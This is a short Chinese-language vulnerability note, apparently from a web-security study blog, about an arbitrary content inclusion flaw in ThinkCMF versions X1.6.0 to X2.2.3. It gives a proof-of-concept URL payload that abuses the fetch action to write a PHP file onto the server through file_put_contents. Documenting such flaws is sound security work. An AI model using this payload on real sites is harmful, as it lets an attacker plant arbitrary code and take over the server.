ThinkCMF框架任意内容包含漏洞

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。

0x01影响版本

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

ThinkCMF X2.2.3

0x02 漏洞利用

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件
payload:

http://xxx.com/?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','')

会在目录下生成test.php文件。

你可能感兴趣的:(WEB安全漏洞学习)